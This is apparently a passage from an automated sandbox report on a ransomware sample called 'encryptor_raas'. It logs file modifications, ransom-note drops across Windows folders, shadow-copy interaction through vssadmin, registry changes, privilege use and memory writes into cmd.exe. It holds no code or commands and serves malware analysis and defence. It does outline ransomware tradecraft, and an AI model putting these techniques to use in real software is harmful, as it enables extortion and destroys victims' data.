File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101866.BMP C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Welcome Tool\IconImagesMask.bmp C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\flyoutBack.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derby.jar C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.nl_ja_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\inf\netbvbda.PNF C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v2.0.50727\UnInstallProfile.SQL C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\amd64_netfx-aspnet_webadmin_images_b03f5f7f11d50a3a_6.1.7600.16385_none_3b995fcfc0e586ab\image2.gif C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\Microsoft.NET\Framework\v4.0.30319\ASP.NETWebAdminFiles\Security\Users\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-l..l-starter.resources_31bf3856ad364e35_6.1.7600.16385_en-us_24090ddf20410f44\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-l..terprisen.resources_31bf3856ad364e35_6.1.7601.17514_fr-fr_bd4d20299386f90e\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-l..terprisen.resources_31bf3856ad364e35_6.1.7601.17514_es-es_76b445ae591253e2\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\inf\avmx64c.PNF C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\inf\mdmbr008.PNF C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..ediadisc-style-push_31bf3856ad364e35_6.1.7600.16385_none_cc073ae540855a07\NavigationUp_ButtonGraphic.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-s..undthemes-afternoon_31bf3856ad364e35_6.1.7600.16385_none_2a05e57d5ab3659e\Windows Hardware Fail.wav C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_es-es_27c74b34efa6572d\about_join.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-l..essionaln.resources_31bf3856ad364e35_6.1.7601.17514_fr-fr_2c8a1d1c5da2edf8\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..ediadisc-style-pets_31bf3856ad364e35_6.1.7600.16385_none_d0d7ee773d711005\Pets_notes-txt-background.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-l..-startere.resources_31bf3856ad364e35_6.1.7600.16385_it-it_67246ac68055bec8\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-l..fessional.resources_31bf3856ad364e35_6.1.7601.17514_fr-fr_98af26a5072718fa\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\inf\mdmbsb.PNF C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-l..homebasic.resources_31bf3856ad364e35_6.1.7601.17514_ja-jp_c985fbedc9886bd1\license.rtf C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..disc-style-stacking_31bf3856ad364e35_6.1.7600.16385_none_d0d2b98d4629a41f\NavigationLeft_SelectionSubpicture.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\x86_microsoft-windows-gadgets-clock_31bf3856ad364e35_6.1.7600.16385_none_d7244b05e242e449\square.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\x86_microsoft-windows-gadgets-weather_31bf3856ad364e35_6.1.7600.16385_none_4db0b909695af8f9\23.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\x86_microsoft-windows-l..-startern.resources_31bf3856ad364e35_6.1.7601.17514_es-es_c82940e03ac63534\license.rtf C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-h..putername.resources_31bf3856ad364e35_6.1.7600.16385_it-it_ec2a8bc0ed056604\OOBE_HELP_Change_Computer_Name.rtf C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-l..nterprise.resources_31bf3856ad364e35_6.1.7601.17514_fr-fr_5d0f22c9e44cb6ed\license.rtf C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-sonic-symphonyntsc_31bf3856ad364e35_6.1.7600.16385_none_d75d6085d60aa50d\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\Web\Wallpaper\Scenes\img28.jpg C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-m..ttheme-ca-component_31bf3856ad364e35_6.1.7601.17514_none_fae061a2e0ae5019\CA-wp6.jpg C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_4c778c357864a2ed\about_functions_advanced_methods.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\x86_microsoft-windows-l..terprisen.resources_31bf3856ad364e35_6.1.7601.17514_ja-jp_6f6cca095bde05bb\license.rtf C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-tapicore_31bf3856ad364e35_6.1.7600.16385_none_402eca316047a0fe\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\inf\wialx005.PNF C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..adisc-style-babyboy_31bf3856ad364e35_6.1.7600.16385_none_f13596916b261f67\navSubpicture.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_it-it_aa520d2885499112\about_job_details.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\x86_microsoft-windows-l..m-starter.resources_31bf3856ad364e35_6.1.7601.17514_de-de_8a445b750021d88a\license.rtf C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_de-de_74b66e05cc4097c8\about_objects.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_4c778c357864a2ed\about_Windows_PowerShell_2.0.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\x86_microsoft-windows-l..terprisee.resources_31bf3856ad364e35_6.1.7601.17514_it-it_66b0580ce2717717\license.rtf C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-rssfeedsgadget_31bf3856ad364e35_6.1.7600.16385_none_07861dacd36a18f4\item_hover_docked.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-weather_31bf3856ad364e35_6.1.7600.16385_none_a9cf548d21b86a2f\5.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_en-us_1da743febb1ea38d\about_methods.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-ringtonesamples_31bf3856ad364e35_6.1.7600.16385_none_135e536ebbe59c28\Ringtone 06.wma C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_it-it_b4a6b77ab9aa530d\about_History.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_56cc3687acc564e8\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\Globalization\MCT\MCT-ZA\Wallpaper\ZA-wp3.jpg C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-weather_31bf3856ad364e35_6.1.7600.16385_none_a9cf548d21b86a2f\45.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_de-de_74b66e05cc4097c8\about_Return.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_it-it_aa520d2885499112\about_History.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_es-es_27c74b34efa6572d\about_WS-Management_Cmdlets.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-l..omebasice.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_d34b7c772c3fe85c\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-weather_31bf3856ad364e35_6.1.7600.16385_none_a9cf548d21b86a2f\12.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-l..-ultimate.resources_31bf3856ad364e35_6.1.7600.16385_it-it_d2c0ff1e722cb495\license.rtf C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-s..dthemes-calligraphy_31bf3856ad364e35_6.1.7600.16385_none_c1407bc73caf8dfc\Windows Exclamation.wav C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_ca7ec133e2786d8f\about_escape_characters.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\inf\mdmcdp.PNF C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\inf\mdmmct.PNF C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\inf\ql40xx.PNF C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_ca7ec133e2786d8f\about_Automatic_Variables.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-l..ultimaten.resources_31bf3856ad364e35_6.1.7601.17514_it-it_1e4d6c8ff7baeac6\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework\v3.5\SQL\it\SqlPersistenceProviderSchema.sql C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-h..homegroup.resources_31bf3856ad364e35_6.1.7600.16385_de-de_ab00b852533a224a\OOBE_HELP_What_is_HomeGroup.rtf C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-s..undthemes-afternoon_31bf3856ad364e35_6.1.7600.16385_none_2a05e57d5ab3659e\Windows Balloon.wav C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_de-de_7f0b185800a159c3\about_pipelines.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_ca7ec133e2786d8f\about_properties.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-ehome-epgtos.resources_31bf3856ad364e35_6.1.7600.16385_it-it_b661d7abc4d159c8\epgtos.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A

Enumerates physical storage devices

Reads user/profile data of web browsers

spyware stealer

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\vssadmin.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 70427c9ce83cdb01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{AD4DF3F1-A8DB-11EF-80CF-C28ADB222BBA} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "438446561" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000303eef0e2cd1a9499efdd285a56ddc5000000000020000000000106600000001000020000000fabede692f1078d982771425538199acac6cd5298d2fcd15234379589b90e401000000000e8000000002000020000000fe901a83de7b3cf7c49cb6b4d1287fa83463d40fc968f1a212ac5aa2ed78432520000000225c48793f07b1f10a8f1bebcd32468073c4a5cf5ba7f5e2daf7fa03af4f7886400000003ec76856395dbb58f7a96acf17b85e295c5009450e74bf0479b46867a5fa09a3ec4d1d086db7174f4f39354a00ef40471567998848570a328f99da4b05b1ac25 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000303eef0e2cd1a9499efdd285a56ddc5000000000020000000000106600000001000020000000a88339490afc8387e9220c9fb3320c82867a78d8685261b1c55296c4c0a48d06000000000e8000000002000020000000b8b24e347ba8a6ad3fcbd0404beb4404c51edbb65f094d4f36d4be847bd7906d9000000087905d2513c42c6925ecbb1df1aed86a2c0cfc77d710cfda0765bb9735cdd6a7c9fcc40cc191ebea197a598df22b8b54499aeaa943b3d6a5be29a5c0dfb07a2d012472f2497afd2e7686931dd3ed53f4b32afc0a62971401002a7f15c71d384fa6081182b31077a30378c111604a6560c5f64e5dced9df371ad21f8eb68e866ccecabec0f9eb3cdf47533a3e790086e5400000006c6d5736b3cdb3db42ccf975f6b34b33f25e81730f977165eb8768eec71744199d405d0ec830b7a7b2bbb37dd28bedbd247c9cb47d4574212a24b755a59b0902 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2316 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe C:\Windows\SysWOW64\cmd.exe
PID 2316 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe C:\Windows\SysWOW64\cmd.exe
PID 2316 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe C:\Windows\SysWOW64\cmd.exe
